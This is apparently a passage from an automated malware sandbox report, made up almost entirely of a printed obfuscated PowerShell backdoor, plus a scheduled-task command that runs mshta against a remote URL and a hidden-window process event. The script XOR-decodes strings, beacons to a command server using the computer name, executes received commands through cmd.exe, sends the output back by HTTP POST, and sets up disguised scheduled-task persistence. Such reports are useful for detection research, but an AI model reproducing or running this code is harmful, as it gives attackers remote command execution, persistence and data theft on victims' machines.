= 35471 -bxor 35578;$b2ZuuGw = [System.Text.Encoding]::UTF8.GetString($U1jgVr9t01);$iuwAqApqcmXkAO = $b2ZuuGw;$pkSm2KoWGmydHl = 'gx68xiwFQubpVyqw53cUF9VUTzYtTJdJQh';$J6czkLmSPP01 = 'Amm0QsmzrP9n7LV4yXGOsTLSlTsBftEjW3';$J6czkLmSPP01 = [System.Text.Encoding]::UTF8.GetBytes($J6czkLmSPP01);$J6czkLmSPP01[0] = 15494 -bxor 15602;$J6czkLmSPP01[1] = 51078 -bxor 51199;$J6czkLmSPP01[2] = 60739 -bxor 60723;$J6czkLmSPP01[3] = 22199 -bxor 22226;$J6czkLmSPP01[4] = 62504 -bxor 62485;$J6czkLmSPP01[5] = 11129 -bxor 11034;$J6czkLmSPP01[6] = 5008 -bxor 5119;$J6czkLmSPP01[7] = 41878 -bxor 41979;$J6czkLmSPP01[8] = 8100 -bxor 8137;$J6czkLmSPP01[9] = 39566 -bxor 39663;$J6czkLmSPP01[10] = 7666 -bxor 7580;$J6czkLmSPP01[11] = 53922 -bxor 53958;$J6czkLmSPP01[12] = 48490 -bxor 48460;$J6czkLmSPP01[13] = 32205 -bxor 32169;$J6czkLmSPP01[14] = 45935 -bxor 45830;$J6czkLmSPP01[15] = 65532 -bxor 65422;$J6czkLmSPP01[16] = 52874 -bxor 52975;$J6czkLmSPP01[17] = 44326 -bxor 44357;$J6czkLmSPP01[18] = 14151 -bxor 14131;$J6czkLmSPP01[19] = 46007 -bxor 46046;$J6czkLmSPP01[20] = 58204 -bxor 58163;$J6czkLmSPP01[21] = 15091 -bxor 15005;$J6czkLmSPP01[22] = 36865 -bxor 36924;$J6czkLmSPP01[23] = 13189 -bxor 13303;$J6czkLmSPP01[24] = 24261 -bxor 24224;$J6czkLmSPP01[25] = 617 -bxor 522;$J6czkLmSPP01[26] = 1398 -bxor 1299;$J6czkLmSPP01[27] = 19254 -bxor 19295;$J6czkLmSPP01[28] = 47697 -bxor 47655;$J6czkLmSPP01[29] = 52994 -bxor 53095;$J6czkLmSPP01[30] = 14975 -bxor 14937;$J6czkLmSPP01[31] = 24397 -bxor 24356;$J6czkLmSPP01[32] = 28344 -bxor 28380;$J6czkLmSPP01[33] = 43809 -bxor 43804;$pkSm2KoWGmydHl = [System.Text.Encoding]::UTF8.GetString($J6czkLmSPP01);$HCp0q = S54m3xeK($pkSm2KoWGmydHl + $SG6M0ouk2cQUfpHV);$finalUrl = $nh8ZPuNg4pK3aOp + $HCp0q;$qr27kycI = [System.Net.WebRequest]::Create($nh8ZPuNg4pK3aOp + $HCp0q);try{$F09ffIubQJm = $qr27kycI.GetResponse();} catch {$OURFvRexTaeE23zV = Get-Random -Maximum 60;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;continue;}$AGDFmtT = $F09ffIubQJm.StatusCode;$CGDqIISmGvhx84xp = 'aB1L';$Z3PnDkPyrJM73T01 = 'IOk1';$Z3PnDkPyrJM73T01 = [System.Text.Encoding]::UTF8.GetBytes($Z3PnDkPyrJM73T01);$Z3PnDkPyrJM73T01[0] = 9069 -bxor 8983;$Z3PnDkPyrJM73T01[1] = 26507 -bxor 26611;$Z3PnDkPyrJM73T01[2] = 28065 -bxor 28099;$Z3PnDkPyrJM73T01[3] = 19950 -bxor 19860;$CGDqIISmGvhx84xp = [System.Text.Encoding]::UTF8.GetString($Z3PnDkPyrJM73T01);$R4db3ayUHUw6A = $CGDqIISmGvhx84xp;$sr1olbnmchzR = '3HjQh';$BmOthTTBpzx601 = 'DSc4W';$BmOthTTBpzx601 = [System.Text.Encoding]::UTF8.GetBytes($BmOthTTBpzx601);$BmOthTTBpzx601[0] = 11248 -bxor 11139;$BmOthTTBpzx601[1] = 26060 -bxor 26040;$BmOthTTBpzx601[2] = 5138 -bxor 5235;$BmOthTTBpzx601[3] = 50639 -bxor 50621;$BmOthTTBpzx601[4] = 40904 -bxor 40892;$sr1olbnmchzR = [System.Text.Encoding]::UTF8.GetString($BmOthTTBpzx601);$gha9dupC = $sr1olbnmchzR;$ud3JSBmy = '7WSFDu';$laADOozsqXRnUEKX01 = 'zdl0r0';$laADOozsqXRnUEKX01 = [System.Text.Encoding]::UTF8.GetBytes($laADOozsqXRnUEKX01);$laADOozsqXRnUEKX01[0] = 1291 -bxor 1378;$laADOozsqXRnUEKX01[1] = 18218 -bxor 18253;$laADOozsqXRnUEKX01[2] = 33393 -bxor 33311;$laADOozsqXRnUEKX01[3] = 25622 -bxor 25721;$laADOozsqXRnUEKX01[4] = 1288 -bxor 1402;$laADOozsqXRnUEKX01[5] = 4445 -bxor 4408;$ud3JSBmy = [System.Text.Encoding]::UTF8.GetString($laADOozsqXRnUEKX01);$GdD5nwImmlfb = $ud3JSBmy;If ($AGDFmtT -eq 200){$x1XuBfdP = New-Object System.IO.StreamReader $F09ffIubQJm.GetResponseStream();$xYlVKzM=$x1XuBfdP.ReadToEnd();if (!$xYlVKzM.Contains('Fail')){if ($xYlVKzM.Contains($R4db3ayUHUw6A)){$INTZ_4FIYL = $xYlVKzM.Substring(16);$aSzFooViwhHMOS = 'Qe6gShw2HEk48NuJdH08FFLNZ9SDUu';$QmtbPoE501 = 'iXit2bA102BXNLHDtLO9qEgZ18C8ml';$QmtbPoE501 = [System.Text.Encoding]::UTF8.GetBytes($QmtbPoE501);$QmtbPoE501[0] = 42900 -bxor 42976;$QmtbPoE501[1] = 1496 -bxor 1441;$QmtbPoE501[2] = 63438 -bxor 63422;$QmtbPoE501[3] = 45050 -bxor 44959;$QmtbPoE501[4] = 56917 -bxor 56936;$QmtbPoE501[5] = 522 -bxor 632;$QmtbPoE501[6] = 4611 -bxor 4710;$QmtbPoE501[7] = 16552 -bxor 16603;$QmtbPoE501[8] = 18031 -bxor 17946;$QmtbPoE501[9] = 24549 -bxor 24457;$QmtbPoE501[10] = 65415 -bxor 65523;$QmtbPoE501[11] = 53065 -bxor 53103;$QmtbPoE501[12] = 56 -bxor 92;$QmtbPoE501[13] = 3692 -bxor 3589;$QmtbPoE501[14] = 16896 -bxor 17010;$QmtbPoE501[15] = 32257 -bxor 32356;$QmtbPoE501[16] = 34225 -bxor 34258;$QmtbPoE501[17] = 23229 -bxor 23241;$QmtbPoE501[18] = 58075 -bxor 58034;$QmtbPoE501[19] = 874 -bxor 773;$QmtbPoE501[20] = 18856 -bxor 18886;$QmtbPoE501[21] = 14808 -bxor 14821;$QmtbPoE501[22] = 13100 -bxor 13151;$QmtbPoE501[23] = 32024 -bxor 32125;$QmtbPoE501[24] = 48573 -bxor 48595;$QmtbPoE501[25] = 29557 -bxor 29457;$QmtbPoE501[26] = 35754 -bxor 35724;$QmtbPoE501[27] = 18256 -bxor 18233;$QmtbPoE501[28] = 10302 -bxor 10330;$QmtbPoE501[29] = 31470 -bxor 31443;$aSzFooViwhHMOS = [System.Text.Encoding]::UTF8.GetString($QmtbPoE501);$Ucwy0 = $aSzFooViwhHMOS;$aerNl = 'KfG0B';$avSeb2v01 = '21Oa4';$avSeb2v01 = [System.Text.Encoding]::UTF8.GetBytes($avSeb2v01);$avSeb2v01[0] = 26583 -bxor 26547;$avSeb2v01[1] = 13113 -bxor 13144;$avSeb2v01[2] = 56692 -bxor 56576;$avSeb2v01[3] = 45665 -bxor 45568;$avSeb2v01[4] = 50960 -bxor 50989;$aerNl = [System.Text.Encoding]::UTF8.GetString($avSeb2v01);$RrQmsQ = $aerNl;$HCp0q = S54m3xeK($Ucwy0 + $SG6M0ouk2cQUfpHV);$kwMplBvRq2zt = $nh8ZPuNg4pK3aOp + $HCp0q;if ($INTZ_4FIYL.Contains($gha9dupC)){cmd.exe /c $INTZ_4FIYL;$Zcg1A0Ue7OSiFQKP = 'M0';$TwnAoLGHUy01 = 'Ja';$TwnAoLGHUy01 = [System.Text.Encoding]::UTF8.GetBytes($TwnAoLGHUy01);$TwnAoLGHUy01[0] = 49887 -bxor 49808;$TwnAoLGHUy01[1] = 17974 -bxor 18045;$Zcg1A0Ue7OSiFQKP = [System.Text.Encoding]::UTF8.GetString($TwnAoLGHUy01);$BK7qm = $Zcg1A0Ue7OSiFQKP;} elseif($INTZ_4FIYL.Contains($GdD5nwImmlfb)){$INTZ_4FIYL = $INTZ_4FIYL.Substring(7);cmd.exe /c $INTZ_4FIYL;$wq95SC = 'alz2ozVEx';$SSe4s9RT4FU301 = '7VbvRmaFz';$SSe4s9RT4FU301 = [System.Text.Encoding]::UTF8.GetBytes($SSe4s9RT4FU301);$SSe4s9RT4FU301[0] = 29420 -bxor 29347;$SSe4s9RT4FU301[1] = 5355 -bxor 5280;$SSe4s9RT4FU301[2] = 2532 -bxor 2491;$SSe4s9RT4FU301[3] = 10724 -bxor 10669;$SSe4s9RT4FU301[4] = 42947 -bxor 42916;$SSe4s9RT4FU301[5] = 33012 -bxor 32922;$SSe4s9RT4FU301[6] = 37054 -bxor 37073;$SSe4s9RT4FU301[7] = 39326 -bxor 39404;$SSe4s9RT4FU301[8] = 17635 -bxor 17542;$wq95SC = [System.Text.Encoding]::UTF8.GetString($SSe4s9RT4FU301);$BK7qm = $wq95SC;} else {cmd.exe /c $INTZ_4FIYL > $jW3dX;$BK7qm = [System.IO.File]::ReadAllText($jW3dX);}$ltymfR5pSPm405Rv = $xYlVKzM + [Environment]::NewLine + $BK7qm;$jBTtUYqXEU_a = SWWZUOAn($ltymfR5pSPm405Rv);$rg32vOo1DUImKMD = [System.Web.HttpUtility]::UrlEncode($jBTtUYqXEU_a);$iuwAqApqcmXkAO = $RrQmsQ + $rg32vOo1DUImKMD;}}}$F09ffIubQJm.Close();if ($kwMplBvRq2zt -ne ''){LuXhxzm2KtHSmTxS $kwMplBvRq2zt $iuwAqApqcmXkAO;}$OURFvRexTaeE23zV = Get-Random -Maximum 15;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;}}HpWPuNxj;
cmdline	"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 60 /tn Office\option\update /tr "mshta http://pumpmotor.net/editor/smartoption.php" /f

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW June 13, 2023, 9:53 a.m.	show_type: 0 filepath_r: PowerShell parameters: $ElksyKqgq = 'NzXwsdKH4mhsJlZ';$dS1me690PeF01 = 'yPY0RHrDa5fVEbN';$dS1me690PeF01 = [System.Text.Encoding]::UTF8.GetBytes($dS1me690PeF01);$dS1me690PeF01[0] = 33312 -bxor 33350;$dS1me690PeF01[1] = 5894 -bxor 5980;$dS1me690PeF01[2] = 53821 -bxor 53844;$dS1me690PeF01[3] = 24611 -bxor 24676;$dS1me690PeF01[4] = 2604 -bxor 2585;$dS1me690PeF01[5] = 43144 -bxor 43234;$dS1me690PeF01[6] = 41855 -bxor 41806;$dS1me690PeF01[7] = 41245 -bxor 41330;$dS1me690PeF01[8] = 43527 -bxor 43583;$dS1me690PeF01[9] = 53707 -bxor 53667;$dS1me690PeF01[10] = 61928 -bxor 61853;$dS1me690PeF01[11] = 4996 -bxor 5066;$dS1me690PeF01[12] = 27428 -bxor 27470;$dS1me690PeF01[13] = 54354 -bxor 54282;$dS1me690PeF01[14] = 35537 -bxor 35463;$ElksyKqgq = [System.Text.Encoding]::UTF8.GetString($dS1me690PeF01);$qPaINTp8mf0 = $ElksyKqgq;function whKgZ($yTCpQOfKack, $xYlVKzM){$rCjLJasyf0m7 = [System.Text.Encoding]::UTF8;$CRABmSSX_ = $rCjLJasyf0m7.GetBytes($yTCpQOfKack);$LyZoc7Ykbs = $rCjLJasyf0m7.GetBytes($xYlVKzM);for ($i=0; $i -lt $LyZoc7Ykbs.length;){for ($j =0; $j -lt $CRABmSSX_.length; $j++){$LyZoc7Ykbs[$i] = $LyZoc7Ykbs[$i] -bxor $CRABmSSX_[$j];$i++;if ($i -ge $LyZoc7Ykbs.length){$j = $CRABmSSX_.length;}}}$ySwqdHx8Dh = [System.Convert]::ToBase64String($LyZoc7Ykbs);$ySwqdHx8Dh = $ySwqdHx8Dh.replace('+', '-').replace('/', '_').replace('=', '');return $ySwqdHx8Dh;}function mdkinhmi0xs63xl($Ube5aXEYlM7){return (-join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) \| Get-Random -Count $Ube5aXEYlM7 \| % {[char]$_}));}function S54m3xeK($nmLUVYfYimhN){$BMxL1 = mdkinhmi0xs63xl(5);$RznphCP = mdkinhmi0xs63xl(7);$xwhlQbRfEg_wwKF = mdkinhmi0xs63xl(16);$V4yUZ8nNguf7 = whKgZ $xwhlQbRfEg_wwKF $nmLUVYfYimhN;$BK7qm = '';$eWPzX = Get-Random -Maximum 5;for ($i = 0; $i -lt $eWPzX; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 16 -Minimum 5;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}if ($BK7qm -eq ''){$BK7qm = $BK7qm + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;} else {$BK7qm = $BK7qm + '&' + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;}$QQ3mvz = Get-Random -Maximum 3;for ($i = 0; $i -lt $QQ3mvz; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 12 -Minimum 1;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}return '?' + $BK7qm;}$T0c4GnRZL0 = 'o8DP9rn5zE1kaF';$VqRvR7u01 = 'rbbyGdyuIHnQEO';$VqRvR7u01 = [System.Text.Encoding]::UTF8.GetBytes($VqRvR7u01);$VqRvR7u01[0] = 3928 -bxor 3898;$VqRvR7u01[1] = 11945 -bxor 11931;$VqRvR7u01[2] = 21808 -bxor 21873;$VqRvR7u01[3] = 25530 -bxor 25550;$VqRvR7u01[4] = 23678 -bxor 23601;$VqRvR7u01[5] = 48796 -bxor 48876;$VqRvR7u01[6] = 55455 -bxor 55513;$VqRvR7u01[7] = 65244 -bxor 65202;$VqRvR7u01[8] = 23263 -bxor 23189;$VqRvR7u01[9] = 38044 -bxor 38133;$VqRvR7u01[10] = 10093 -bxor 10027;$VqRvR7u01[11] = 62542 -bxor 62470;$VqRvR7u01[12] = 48053 -bxor 48124;$VqRvR7u01[13] = 45810 -bxor 45719;$T0c4GnRZL0 = [System.Text.Encoding]::UTF8.GetString($VqRvR7u01);$ANNaEKn24PF = $T0c4GnRZL0;function SWWZUOAn($yPvXZCD3UDvC_1I7){return [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));}function LiYMh74($yPvXZCD3UDvC_1I7){$b64str = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));return $b64str.replace('+', '-').replace('/', '_').replace('=', '');}function LuXhxzm2KtHSmTxS($OOa9P1cGqThqWwO3, $WnI_R){$SUZgLOy = [System.Text.Encoding]::UTF8.GetBytes($WnI_R);[System.Net.HttpWebRequest] $hcAiTwqCt9PwT = [System.Net.WebRequest]::Create($OOa9P1cGqThqWwO3);$U_NUkepb71Q = 's1lb';$AXQigUrD6uwklW01 = 'cc3g';$AXQigUrD6uwklW01 = [System.Text.Encoding]::UTF8.GetBytes($AXQigUrD6uwklW01);$AXQigUrD6uwklW01[0] = 28594 -bxor 28642;$AXQigUrD6uwklW01[1] = 7544 -bxor 7479;$AXQigUrD6uwklW01[2] = 14992 -bxor 15043;$AXQigUrD6uwklW01[3] = 65336 -bxor 65388;$U_NUkepb71Q = [System.Text.Encoding]::UTF8.GetString($AXQigUrD6uwklW01);$hcAiTwqCt9PwT.Method = $U_NUkepb71Q;$frNzen = 'x0ymi50wOBCHMa0vesHUk0hjaQq9yd1VV';$S9ybl01 = '7ZX6LiBugDgzhtuC3mTvXB60vUCC2aeFY';$S9ybl01 = [System.Text.Encoding]::UTF8.GetBytes($S9ybl01);$S9ybl01[0] = 46122 -bxor 46155;$S9ybl01[1] = 23347 -bxor 23363;$S9ybl01[2] = 58757 -bxor 58869;$S9ybl01[3] = 51395 -bxor 51375;$S9ybl01[4] = 9968 -bxor 9881;$S9ybl01[5] = 37098 -bxor 37001;$S9ybl01[6] = 55070 -bxor 55167;$S9ybl01[7] = 48095 -bxor 48043;$S9ybl01[8] = 48069 -bxor 48044;$S9ybl01[9] = 29814 -bxor 29721;$S9ybl01[10] = 49656 -bxor 49558;$S9ybl01[11] = 10102 -bxor 10073;$S9ybl01[12] = 51918 -bxor 51894;$S9ybl01[13] = 451 -bxor 494;$S9ybl01[14] = 20934 -bxor 20913;$S9ybl01[15] = 52408 -bxor 52431;$S9ybl01[16] = 40458 -bxor 40573;$S9ybl01[17] = 3704 -bxor 3669;$S9ybl01[18] = 8554 -bxor 8460;$S9ybl01[19] = 42369 -bxor 42478;$S9ybl01[20] = 2424 -bxor 2314;$S9ybl01[21] = 6571 -bxor 6598;$S9ybl01[22] = 28974 -bxor 28931;$S9ybl01[23] = 37068 -bxor 37049;$S9ybl01[24] = 9358 -bxor 9468;$S9ybl01[25] = 51114 -bxor 51142;$S9ybl01[26] = 10436 -bxor 10401;$S9ybl01[27] = 27496 -bxor 27398;$S9ybl01[28] = 20560 -bxor 20531;$S9ybl01[29] = 47641 -bxor 47734;$S9ybl01[30] = 43655 -bxor 43747;$S9ybl01[31] = 40920 -bxor 40893;$S9ybl01[32] = 7073 -bxor 7109;$frNzen = [System.Text.Encoding]::UTF8.GetString($S9ybl01);$hcAiTwqCt9PwT.ContentType = $frNzen;$hcAiTwqCt9PwT.ContentLength = $SUZgLOy.Length;try{$eLj81Oe = $hcAiTwqCt9PwT.GetRequestStream();$eLj81Oe.Write($SUZgLOy, 0, $SUZgLOy.Length);$eLj81Oe.Flush();$eLj81Oe.Close();[System.Net.HttpWebResponse] $jUYS0IdI = $hcAiTwqCt9PwT.GetResponse();$kHx3AO8E = New-Object System.IO.StreamReader($jUYS0IdI.GetResponseStream());$BK7qm = $kHx3AO8E.ReadToEnd();return $BK7qm;} catch {return '';}}function HsnmKyIW4V($wj_uC5xvtcOmXJ){$arEdmGvRqoSs = '3MAHqhnlu03NTncqN8SgQh5sFjssvVNpZzTs6GSqD4Kh2t6AH';$YGF4zEt9ImmOq8V01 = 'uv0m16W4c6b0q05fjNAIs75vvYfptNUZSy2FmYzauDl06kKtb';$YGF4zEt9ImmOq8V01 = [System.Text.Encoding]::UTF8.GetBytes($YGF4zEt9ImmOq8V01);$YGF4zEt9ImmOq8V01[0] = 441 -bxor 468;$YGF4zEt9ImmOq8V01[1] = 30585 -bxor 30474;$YGF4zEt9ImmOq8V01[2] = 36323 -bxor 36235;$YGF4zEt9ImmOq8V01[3] = 37198 -bxor 37178;$YGF4zEt9ImmOq8V01[4] = 40078 -bxor 40175;$YGF4zEt9ImmOq8V01[5] = 38586 -bxor 38554;$YGF4zEt9ImmOq8V01[6] = 60840 -bxor 60864;$YGF4zEt9ImmOq8V01[7] = 46333 -bxor 46217;$YGF4zEt9ImmOq8V01[8] = 65258 -bxor 65182;$YGF4zEt9ImmOq8V01[9] = 24688 -bxor 24576;$YGF4zEt9ImmOq8V01[10] = 28202 -bxor 28176;$YGF4zEt9ImmOq8V01[11] = 21153 -bxor 21134;$YGF4zEt9ImmOq8V01[12] = 19285 -bxor 19322;$YGF4zEt9ImmOq8V01[13] = 17638 -bxor 17558;$YGF4zEt9ImmOq8V01[14] = 23888 -bxor 23845;$YGF4zEt9ImmOq8V01[15] = 64778 -bxor 64871;$YGF4zEt9ImmOq8V01[16] = 28327 -bxor 28375;$YGF4zEt9ImmOq8V01[17] = 47484 -bxor 47377;$YGF4zEt9ImmOq8V01[18] = 36253 -bxor 36338;$YGF4zEt9ImmOq8V01[19] = 24347 -bxor 24431;$YGF4zEt9ImmOq8V01[20] = 18501 -bxor 18474;$YGF4zEt9ImmOq8V01[21] = 36431 -bxor 36413;$YGF4zEt9ImmOq8V01[22] = 58881 -bxor 58927;$YGF4zEt9ImmOq8V01[23] = 48386 -bxor 48492;$YGF4zEt9ImmOq8V01[24] = 30443 -bxor 30350;$YGF4zEt9ImmOq8V01[25] = 4839 -bxor 4755;$YGF4zEt9ImmOq8V01[26] = 49836 -bxor 49795;$YGF4zEt9ImmOq8V01[27] = 58161 -bxor 58196;$YGF4zEt9ImmOq8V01[28] = 11345 -bxor 11317;$YGF4zEt9ImmOq8V01[29] = 15971 -bxor 15882;$YGF4zEt9ImmOq8V01[30] = 14289 -bxor 14245;$YGF4zEt9ImmOq8V01[31] = 16163 -bxor 16204;$YGF4zEt9ImmOq8V01[32] = 41830 -bxor 41748;$YGF4zEt9ImmOq8V01[33] = 60433 -bxor 60478;$YGF4zEt9ImmOq8V01[34] = 49169 -bxor 49250;$YGF4zEt9ImmOq8V01[35] = 43694 -bxor 43715;$YGF4zEt9ImmOq8V01[36] = 38532 -bxor 38629;$YGF4zEt9ImmOq8V01[37] = 54818 -bxor 54864;$YGF4zEt9ImmOq8V01[38] = 10972 -bxor 10920;$YGF4zEt9ImmOq8V01[39] = 12822 -bxor 12921;$YGF4zEt9ImmOq8V01[40] = 32341 -bxor 32293;$YGF4zEt9ImmOq8V01[41] = 22378 -bxor 22302;$YGF4zEt9ImmOq8V01[42] = 29039 -bxor 28934;$YGF4zEt9ImmOq8V01[43] = 41069 -bxor 40962;$YGF4zEt9ImmOq8V01[44] = 31435 -bxor 31397;$YGF4zEt9ImmOq8V01[45] = 5356 -bxor 5314;$YGF4zEt9ImmOq8V01[46] = 53862 -bxor 53782;$YGF4zEt9ImmOq8V01[47] = 42702 -bxor 42662;$YGF4zEt9ImmOq8V01[48] = 26219 -bxor 26139;$arEdmGvRqoSs = [System.Text.Encoding]::UTF8.GetString($YGF4zEt9ImmOq8V01);$LNCKYBeJkQ = $arEdmGvRqoSs;schtasks /create /sc minute /mo 60 /tn $wj_uC5xvtcOmXJ /tr $LNCKYBeJkQ /f;}Add-Type -AssemblyName System.Web;function HpWPuNxj(){$aDqmdv69z2D = 'CcMtwBVs1FrdaHKvuAy0O7lwikCDP1blIoiPRVCAKE4JINSMu20WWTKlb';$h0Osuy3sf0um4xob01 = 'KxYDx7KGK60vfXbO9SWmMk39bDwMEsaaIDF9KmGMhFdbv83lteymEPSNS';$h0Osuy3sf0um4xob01 = [System.Text.Encoding]::UTF8.GetBytes($h0Osuy3sf0um4xob01);$h0Osuy3sf0um4xob01[0] = 40925 -bxor 40885;$h0Osuy3sf0um4xob01[1] = 25917 -bxor 25929;$h0Osuy3sf0um4xob01[2] = 10834 -bxor 10790;$h0Osuy3sf0um4xob01[3] = 25035 -bxor 25019;$h0Osuy3sf0um4xob01[4] = 55363 -bxor 55417;$h0Osuy3sf0um4xob01[5] = 63115 -bxor 63140;$h0Osuy3sf0um4xob01[6] = 44806 -bxor 44841;$h0Osuy3sf0um4xob01[7] = 61613 -bxor 61638;$h0Osuy3sf0um4xob01[8] = 1647 -bxor 1546;$h0Osuy3sf0um4xob01[9] = 8875 -bxor 8901;$h0Osuy3sf0um4xob01[10] = 32648 -bxor 32764;$h0Osuy3sf0um4xob01[11] = 20987 -bxor 20876;$h0Osuy3sf0um4xob01[12] = 21901 -bxor 21996;$h0Osuy3sf0um4xob01[13] = 50279 -bxor 50195;$h0Osuy3sf0um4xob01[14] = 9552 -bxor 9525;$h0Osuy3sf0um4xob01[15] = 9180 -bxor 9134;$h0Osuy3sf0um4xob01[16] = 32380 -bxor 32338;$h0Osuy3sf0um4xob01[17] = 9253 -bxor 9286;$h0Osuy3sf0um4xob01[18] = 51020 -bxor 50978;$h0Osuy3sf0um4xob01[19] = 40144 -bxor 40191;$h0Osuy3sf0um4xob01[20] = 14537 -bxor 14506;$h0Osuy3sf0um4xob01[21] = 43110 -bxor 43015;$h0Osuy3sf0um4xob01[22] = 12761 -bxor 12730;$h0Osuy3sf0um4xob01[23] = 23564 -bxor 23652;$h0Osuy3sf0um4xob01[24] = 42886 -bxor 42979;$h0Osuy3sf0um4xob01[25] = 28120 -bxor 28075;$h0Osuy3sf0um4xob01[26] = 945 -bxor 926;$h0Osuy3sf0um4xob01[27] = 63474 -bxor 63377;$h0Osuy3sf0um4xob01[28] = 8366 -bxor 8399;$h0Osuy3sf0um4xob01[29] = 63486 -bxor 63389;$h0Osuy3sf0um4xob01[30] = 58761 -bxor 58849;$h0Osuy3sf0um4xob01[31] = 30054 -bxor 29955;$h0Osuy3sf0um4xob01[32] = 9022 -bxor 9037;$h0Osuy3sf0um4xob01[33] = 3921 -bxor 3854;$h0Osuy3sf0um4xob01[34] = 7213 -bxor 7257;$h0Osuy3sf0um4xob01[35] = 34342 -bxor 34371;$h0Osuy3sf0um4xob01[36] = 44059 -bxor 44150;$h0Osuy3sf0um4xob01[37] = 12710 -bxor 12758;$h0Osuy3sf0um4xob01[38] = 3611 -bxor 3703;$h0Osuy3sf0um4xob01[39] = 38279 -bxor 38374;$h0Osuy3sf0um4xob01[40] = 10949 -bxor 10929;$h0Osuy3sf0um4xob01[41] = 62189 -bxor 62088;$h0Osuy3sf0um4xob01[42] = 65064 -bxor 65031;$h0Osuy3sf0um4xob01[43] = 19120 -bxor 19141;$h0Osuy3sf0um4xob01[44] = 19944 -bxor 19867;$h0Osuy3sf0um4xob01[45] = 39289 -bxor 39196;$h0Osuy3sf0um4xob01[46] = 62317 -bxor 62239;$h0Osuy3sf0um4xob01[47] = 46715 -bxor 46676;$h0Osuy3sf0um4xob01[48] = 31947 -bxor 31906;$h0Osuy3sf0um4xob01[49] = 41223 -bxor 41321;$h0Osuy3sf0um4xob01[50] = 32964 -bxor 32928;$h0Osuy3sf0um4xob01[51] = 13877 -bxor 13904;$h0Osuy3sf0um4xob01[52] = 26292 -bxor 26316;$h0Osuy3sf0um4xob01[53] = 17762 -bxor 17740;$h0Osuy3sf0um4xob01[54] = 53838 -bxor 53822;$h0Osuy3sf0um4xob01[55] = 39672 -bxor 39568;$h0Osuy3sf0um4xob01[56] = 16701 -bxor 16717;$aDqmdv69z2D = [System.Text.Encoding]::UTF8.GetString($h0Osuy3sf0um4xob01);$nh8ZPuNg4pK3aOp = $aDqmdv69z2D;$SG6M0ouk2cQUfpHV = LiYMh74($env:COMPUTERNAME);if ($SG6M0ouk2cQUfpHV -eq ''){$rbbqyvzmbQxW5vj = 'm4JO4dFbEn3j';$jDyM0BkFGCVhyt01 = 'R5m7du2ge0PV';$jDyM0BkFGCVhyt01 = [System.Text.Encoding]::UTF8.GetBytes($jDyM0BkFGCVhyt01);$jDyM0BkFGCVhyt01[0] = 42523 -bxor 42602;$jDyM0BkFGCVhyt01[1] = 14543 -bxor 14519;$jDyM0BkFGCVhyt01[2] = 50284 -bxor 50261;$jDyM0BkFGCVhyt01[3] = 48121 -bxor 48074;$jDyM0BkFGCVhyt01[4] = 25864 -bxor 25946;$jDyM0BkFGCVhyt01[5] = 64399 -bxor 64492;$jDyM0BkFGCVhyt01[6] = 41398 -bxor 41410;$jDyM0BkFGCVhyt01[7] = 63962 -bxor 63976;$jDyM0BkFGCVhyt01[8] = 40459 -bxor 40524;$jDyM0BkFGCVhyt01[9] = 39021 -bxor 38964;$jDyM0BkFGCVhyt01[10] = 29569 -bxor 29616;$jDyM0BkFGCVhyt01[11] = 12724 -bxor 12762;$rbbqyvzmbQxW5vj = [System.Text.Encoding]::UTF8.GetString($jDyM0BkFGCVhyt01);$SG6M0ouk2cQUfpHV = $rbbqyvzmbQxW5vj;}$cL4OLMozllhTOvN0 = 'mc3xH8dj1pOYCYTMFUU';$i_yupXum9o4A01 = 'n97O4RL1O9meVciqKn9';$i_yupXum9o4A01 = [System.Text.Encoding]::UTF8.GetBytes($i_yupXum9o4A01);$i_yupXum9o4A01[0] = 25703 -bxor 25661;$i_yupXum9o4A01[1] = 24729 -bxor 24745;$i_yupXum9o4A01[2] = 43535 -bxor 43579;$i_yupXum9o4A01[3] = 39771 -bxor 39697;$i_yupXum9o4A01[4] = 2522 -bxor 2493;$i_yupXum9o4A01[5] = 10517 -bxor 10604;$i_yupXum9o4A01[6] = 20530 -bxor 20490;$i_yupXum9o4A01[7] = 19045 -bxor 18997;$i_yupXum9o4A01[8] = 39629 -bxor 39594;$i_yupXum9o4A01[9] = 10440 -bxor 10392;$i_yupXum9o4A01[10] = 6161 -bxor 6183;$i_yupXum9o4A01[11] = 24150 -bxor 24069;$i_yupXum9o4A01[12] = 9906 -bxor 9856;$i_yupXum9o4A01[13] = 18939 -bxor 18850;$i_yupXum9o4A01[14] = 2491 -bxor 2521;$i_yupXum9o4A01[15] = 41121 -bxor 41103;$i_yupXum9o4A01[16] = 15101 -bxor 15001;$i_yupXum9o4A01[17] = 61464 -bxor 61561;$i_yupXum9o4A01[18] 